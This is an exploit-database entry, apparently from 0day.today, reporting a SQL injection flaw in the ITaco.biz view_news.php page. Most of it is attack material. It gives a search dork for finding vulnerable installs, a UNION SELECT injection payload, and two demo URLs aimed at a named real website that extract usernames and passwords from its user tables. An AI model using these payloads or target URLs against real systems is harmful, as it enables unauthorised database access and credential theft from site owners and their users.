id: 10633
date: 01/06/2010
title: ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability
author: Err0R
cves: 

=============================================================
ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability
=============================================================


-----------------------------------------------------------------------------
 
# (+) dork : intext"powered by itaco group"
 
-----------------------------------------------------------------------------
 
# (+) Exploit : site/path/view_news.php?id=-999+union+select+1,2,3,4,5,6,7,8,9--
and you come the Inject
(+) Demo :-
Username : http://ardabiliec.ir/view_news.php?id=-117+union+select+1,2,3,userid,5,6,7,8,9+from+ardabil_ardabil_iec.userlog%20--
 
Passoword: http://ardabiliec.ir/view_news.php?id=-117+union+select+1,2,3,password,5,6,7,8,9+from+ardabil_ardabil_iec.users--
 
-----------------------------------------------------------------------------



#  0day.today [2023-03-23]  #